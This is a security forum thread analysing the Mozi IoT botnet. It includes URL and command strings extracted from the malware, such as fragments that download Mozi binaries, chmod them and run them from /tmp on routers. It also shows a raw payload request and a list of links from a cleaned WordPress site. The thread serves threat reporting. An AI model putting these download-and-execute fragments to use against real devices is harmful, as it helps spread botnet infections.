Avast WEBforum
Other => Viruses and worms => Topic started by: polonus on May 09, 2021, 01:48:15 PM
-
See: https://urlhaus.abuse.ch/url/1212440/
One to report: https://www.virustotal.com/gui/ip-address/101.180.105.163/detection
Now also reported here: https://ip-46.com/101.180.105.163#ip-feeds
Mozi has been designed to specifically to attack low-power smart devices. Once installed, the malware tries to make contact with other infected devices, adding itself to the Mozi botnet. Once registered, the infected device continues toAccording to the report, the Mozi botnet malware targets devices that use MIPS and ARM processors – both of which are very common in low-power smart home hardware. Also infects wireless routers.
DHT node on various addresses: https://www.shodan.io/search?query=101.180.105.163
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Here the malcode uri's workings are being confirmed through means of working an URL extractor onto it:
-http://%s:%d
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
-http://%s:%d/Mozi.a;sh
-http://%s:%d/Mozi.m
-http://%s:%d/Mozi.m+-O+-
-http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
-http://%s:%d/Mozi.m;/tmp/Mozi.m
-http://%s:%d/bin.sh
-http://%s:%d/bin.sh;chmod
-http://%s:%d/i
-http://%s:%d/i;chmod
-http://127.0.0.1
-http://baidu.com/%s/%s/%d/%s/%s/%s/%s) kicking up a search error
-http://ipinfo.io/ip
-http://purenetworks.com/HNAP1/
-http://schemas.xmlsoap.org/soap/encoding/
-http://schemas.xmlsoap.org/soap/envelope/
-http://schemas.xmlsoap.org/soap/envelope//
-http://www.w3.org/2001/XMLSchema
-http://www.w3.org/2001/XMLSchema-instance
all links blocked by me with - for obvious reasons.
polonus
-
And some attackers use UPX as a compressor of malware to bypass detection*:
-http://%s?o??:%d/Mo?.m+-O
-http://upx.sf.net *
GET /-Mo?.m+-O HTTP/1.0
Host: -%s?o??:%d
User-Agent: Malzilla original browser
Referer: -http://%s?o??:%d/Mo?.m+-O
Accept-Encoding: gzip
Normally one should get a 400 Bad Request,
polonus
-
Here the initial malware has been cleansed apparently:
Reported -> https://urlhaus.abuse.ch/url/1217299/
Scanned for: https://sitecheck.sucuri.net/results/https/salvajeglamping.com/wp-content/js_composer_/include/params/animation_style/HMYopU9fek
Extracted were:
-http://gmpg.org/xfn/11
-https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
-https://api.w.org/
-https://cdnjs.cloudflare.com/ajax/libs/simple-line-icons/2.4.1/css/simple-line-icons.css
-https://engine.lobbypms.com/salvaje-glamping
-https://fonts.googleapis.com/css?family=Roboto:400
-https://maps.googleapis.com/maps/api/js?key=AIzaSyAox3dhEE18KtzKyecJ4iKBxr_oMosAa1g&language=en
-https://salvajeglamping.com
-https://salvajeglamping.com-content/uploads/2019/09/recargate-de-energia.jpg?id=235)
-https://salvajeglamping.com/
-https://salvajeglamping.com/author/salvaje/
-https://salvajeglamping.com/bioseguridad/
-https://salvajeglamping.com/comments/feed/
-https://salvajeglamping.com/conoce-mas/
-https://salvajeglamping.com/contactenos/
-https://salvajeglamping.com/feed/
-https://salvajeglamping.com/glamping-y-tarifas/
-https://salvajeglamping.com/terminos-y-condiciones/
-https://salvajeglamping.com/ubicacion/
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/porto-functionality/shortcodes/assets/js/map-loader.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/themes/porto-child/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/bootstrap_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/dynamic_style_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/ie.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/plugins.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/shortcodes_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/skin_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/theme.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/js/bootstrap.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/html5shiv.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/plugins.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/popper.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/respond.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/theme.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/uploads/2016/09/pin.png
-https://salvajeglamping.com/wp-content/uploads/2019/10/IMG_9823.jpg
-https://salvajeglamping.com/wp-content/uploads/2019/10/leaves-2.jpg
-https://salvajeglamping.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/comment-reply.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
-https://salvajeglamping.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
-https://salvajeglamping.com/wp-includes/js/wp-embed.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/wlwmanifest.xml
-https://salvajeglamping.com/wp-json/
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsalvajeglamping.com%2F
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url
-https%3A%2F%2Fsalvajeglamping.com%2F&format=xml
-https://salvajeglamping.com/wp-json/wp/v2/pages/143
-https://salvajeglamping.com/wp/conoce-mas/
-https://salvajeglamping.com/wp/wp-content/uploads/2019/10/logo-salvaje-white.png
-https://salvajeglamping.com/xmlrpc.php
-https://salvajeglamping.com/xmlrpc.php?rsd
-https://wa.me/3006382616
-https://wa.me/3012159543
-https://www.facebook.com/SalvajeGlamping/
-https://www.instagram.com/salvajeglamping/
-https://youtu.be/DnoFXMfAyGI
polonus